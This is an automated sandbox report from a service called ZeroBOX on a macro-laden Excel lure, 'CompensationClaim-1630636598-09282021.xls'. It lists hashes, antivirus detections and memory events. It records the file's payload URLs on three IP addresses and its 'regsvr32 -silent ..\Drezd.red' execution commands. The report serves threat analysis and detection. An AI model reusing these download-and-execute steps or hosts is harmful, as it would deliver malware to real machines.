Favorites
Tools
Dr.Zero Chatbot
Notifications
Guide 2020-06-10
Version history 2020-06-10

Summary | ZeroBOX

CompensationClaim-1630636598-09282021.xls

VBA_macro Generic Malware MSOffice File

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Sept. 29, 2021, 4:17 p.m.	Sept. 29, 2021, 4:19 p.m.

Size	137.0KB
Type	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Test, Last Saved By: Test, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 18:17:20 2015, Last Saved Time/Date: Tue Sep 28 07:54:40 2021, Security: 0
MD5	`f3e5e9eb94f7bc0115c4b373093d085d`
SHA256	`a57b036af033da6944bb62320662310585d2f23b1d275cd7f01f9c786608e551`
CRC32	`F4BE382A`
ssdeep	`3072:Yk3hOdsylKlgxopeiBNhZFGzE+cL2kdAH11ScHlwFPYidH4C1TsNku0KRjkR+T99:Yk3hOdsylKlgxopeiBNhZF+E+W2kdAmi`
Yara	Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries] Generic_Malware_Zero - Generic Malware Microsoft_Office_File_Zero - Microsoft Office File

EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office15\EXCEL.EXE" C:\Users\test22\AppData\Local\Temp\CompensationClaim-1630636598-09282021.xls
2364
- regsvr32.exe regsvr32 -silent ..\Drezd.red
  1716
- regsvr32.exe regsvr32 -silent ..\Drezd1.red
  2544
- regsvr32.exe regsvr32 -silent ..\Drezd2.red
  2264

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
185.141.27.213	Active	Moloch
190.14.37.187	Active	Moloch
94.140.112.126	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Allocates read-write-execute memory (usually to unpack itself) (9 events)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Sept. 29, 2021, 4:17 p.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6bf98000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory Sept. 29, 2021, 4:17 p.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6bb8e000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory Sept. 29, 2021, 4:17 p.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0626f000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory Sept. 29, 2021, 4:17 p.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0626f000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory Sept. 29, 2021, 4:17 p.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0626f000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory Sept. 29, 2021, 4:17 p.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0626f000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory Sept. 29, 2021, 4:17 p.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0816c000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory Sept. 29, 2021, 4:17 p.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0816c000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory Sept. 29, 2021, 4:18 p.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6ac32000 process_handle: 0xffffffff	1	0	0

Creates a suspicious process (3 events)

cmdline	regsvr32 -silent ..\Drezd1.red
cmdline	regsvr32 -silent ..\Drezd2.red
cmdline	regsvr32 -silent ..\Drezd.red

File has been identified by 5 AntiVirus engines on VirusTotal as malicious (5 events)

McAfee	X97M/Downloader.ln
Cyren	X97M/Downldr.TS.gen!Eldorado
TrendMicro-HouseCall	TROJ_FRS.VSNTIS21
BitDefender	VB:Trojan.VBA.Agent.BLB
McAfee-GW-Edition	Artemis!Trojan

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Sept. 29, 2021, 4:17 p.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7ef70000 process_handle: 0xffffffff	1	0	0

Communicates with host for which no DNS query was performed (3 events)

host	185.141.27.213
host	190.14.37.187
host	94.140.112.126

Network communications indicative of a potential document or script payload download was initiated by the process excel.exe (3 events)

Time & API	Arguments	Status	Return	Repeated
URLDownloadToFileW Sept. 29, 2021, 4:17 p.m.	url: http://190.14.37.187/44468.6789060185.dat stack_pivoted: 0 filepath_r: ..\Drezd.red filepath: C:\Users\test22\Drezd.red		2148270085	0
URLDownloadToFileW Sept. 29, 2021, 4:18 p.m.	url: http://94.140.112.126/44468.6789060185.dat stack_pivoted: 0 filepath_r: ..\Drezd1.red filepath: C:\Users\test22\Drezd1.red		2148270085	0
URLDownloadToFileW Sept. 29, 2021, 4:18 p.m.	url: http://185.141.27.213/44468.6789060185.dat stack_pivoted: 0 filepath_r: ..\Drezd2.red filepath: C:\Users\test22\Drezd2.red		2148270085	0

One or more non-whitelisted processes were created (3 events)

parent_process	excel.exe				martian_process	regsvr32 -silent ..\Drezd1.red
parent_process	excel.exe				martian_process	regsvr32 -silent ..\Drezd2.red
parent_process	excel.exe				martian_process	regsvr32 -silent ..\Drezd.red

Generates some ICMP traffic

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (3 events)

dead_host	94.140.112.126:80
dead_host	190.14.37.187:80
dead_host	185.141.27.213:80